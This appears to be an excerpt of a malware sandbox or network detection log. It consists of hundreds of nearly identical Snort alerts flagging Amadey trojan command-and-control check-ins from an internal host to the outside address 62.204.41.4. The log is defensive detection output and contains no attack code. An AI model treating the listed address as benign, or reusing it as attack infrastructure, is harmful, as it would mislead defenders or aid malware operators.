                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49792 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49793 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49794 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49795 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49796 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49797 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49798 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49799 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49800 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49801 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49802 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49803 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49804 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49805 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49806 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49807 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49808 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49809 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49810 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49811 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49812 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49814 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49815 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49816 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49817 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49818 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49819 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49820 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49821 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49822 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49823 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49824 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49825 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49826 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49827 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49828 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49829 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49830 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49831 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49832 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49833 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49834 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49835 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49836 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49837 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49838 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49839 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49840 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49841 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49842 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49843 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49844 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49845 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49846 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49847 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49848 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49849 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49850 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49851 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49852 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49853 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49854 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49855 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49856 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49857 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49858 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49859 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49860 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49861 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49862 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49863 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49864 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49865 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49866 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49867 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49868 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49869 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49870 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49871 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49872 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49873 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49874 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49875 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49876 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49877 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49878 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49879 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49881 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49882 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49883 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49884 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49885 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49886 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49887 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49888 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49889 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49890 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49891 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49892 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49893 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49894 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49895 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49896 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49897 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49898 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49899 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49900 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49901 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49902 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49903 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49904 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49905 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49906 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49907 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49908 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49909 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49910 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49911 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49912 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49913 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49914 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49915 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49916 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49917 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49918 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49919 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49920 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49921 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49922 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49923 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49924 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49925 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49926 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49927 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49928 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49929 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49930 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49931 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49932 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49933 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49934 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49935 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49936 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49937 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49938 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49939 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49940 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49941 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49942 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49943 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49944 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49945 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49946 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49947 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49948 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49949 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49950 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49951 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49952 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49953 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49954 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49955 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49956 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49957 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49958 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49959 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49960 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49961 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49962 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49963 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49964 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49965 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49966 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49967 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49968 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49969 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49970 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49971 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49973 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49974 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49975 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49976 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49977 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49978 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49979 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49980 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49981 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49982 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49983 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49984 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49985 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49986 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49987 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49988 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49989 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49990 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49991 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49992 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49993 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49994 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49995 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49996 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49997 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49998 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:49999 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50000 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50001 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50002 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50003 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50004 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50005 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50006 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50007 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50008 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50009 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50010 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50011 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50012 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50013 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50014 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50015 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50016 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50017 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50018 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50019 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50020 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50021 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50022 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50023 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50024 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50025 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50026 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50027 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.6:50028 -> 62.204.41.4:80
